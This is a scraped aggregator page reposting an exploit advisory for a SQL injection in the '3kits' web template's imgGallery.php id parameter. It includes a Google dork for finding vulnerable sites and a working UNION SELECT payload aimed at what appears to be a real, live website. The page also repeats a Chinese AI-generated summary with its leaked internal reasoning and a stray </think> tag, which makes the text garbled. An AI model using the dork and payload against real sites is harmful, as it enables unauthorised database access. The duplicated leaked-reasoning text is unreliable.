3kits template SQL Injection via imgGallery.php id parameter
嗯,用户让我总结一篇文章的内容,控制在100字以内,而且不需要特定的开头。首先,我需要仔细阅读文章内容。看起来这是一篇关于SQL注入漏洞的报告,标题是“3kits - Sql Injection”。作者是Hossein_0xB,测试环境是Windows 10。 文章中提到了一个概念验证的链接,链接里有注入点,比如id=-3 union select 1,version(),3,4。这表明攻击者可以利用这个漏洞来获取数据库信息。此外,文章还提到发现了这个漏洞,并提供了联系邮箱。 用户的需求是用中文总结,所以我要确保内容准确且简洁。重点包括漏洞类型、影响范围、测试环境和概念验证。同时,要避免使用“这篇文章”这样的开头词。 最后,检查字数是否在限制内,并确保语言流畅自然。这样用户就能快速了解文章的核心内容了。 </think> 这篇文章披露了3kits软件中的SQL注入漏洞,攻击者可通过构造特定URL访问敏感数据库信息。该漏洞已在Windows 10环境下验证成功。 2025-11-4 20:50:21 Author: cxsecurity.com(查看原文) 阅读量:11 收藏
嗯,用户让我总结一篇文章的内容,控制在100字以内,而且不需要特定的开头。首先,我需要仔细阅读文章内容。看起来这是一篇关于SQL注入漏洞的报告,标题是“3kits - Sql Injection”。作者是Hossein_0xB,测试环境是Windows 10。 文章中提到了一个概念验证的链接,链接里有注入点,比如id=-3 union select 1,version(),3,4。这表明攻击者可以利用这个漏洞来获取数据库信息。此外,文章还提到发现了这个漏洞,并提供了联系邮箱。 用户的需求是用中文总结,所以我要确保内容准确且简洁。重点包括漏洞类型、影响范围、测试环境和概念验证。同时,要避免使用“这篇文章”这样的开头词。 最后,检查字数是否在限制内,并确保语言流畅自然。这样用户就能快速了解文章的核心内容了。 </think> 这篇文章披露了3kits软件中的SQL注入漏洞,攻击者可通过构造特定URL访问敏感数据库信息。该漏洞已在Windows 10环境下验证成功。 2025-11-4 20:50:21 Author: cxsecurity.com(查看原文) 阅读量:11 收藏
#Exploit Title: 3kits - Sql Injection #Google Dork: "Designed & Developed by 3kits" #Date: 2025-11-03 #Exploit Author: Hossein_0xB #Category: webapps #Tested on : Windows 10 #CVE : Proof of Concept: ### Demo : https://hyderabadrealtors.org/imgGallery.php?id=-3 union select 1,version(),3,4 ********************************************************* #Discovered by: Hossein_0xB #Email: [email protected] *********************************************************
Thanks for you comment!
Your message is in quarantine 48 hours.
文章来源: https://cxsecurity.com/issue/WLB-2025110005
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh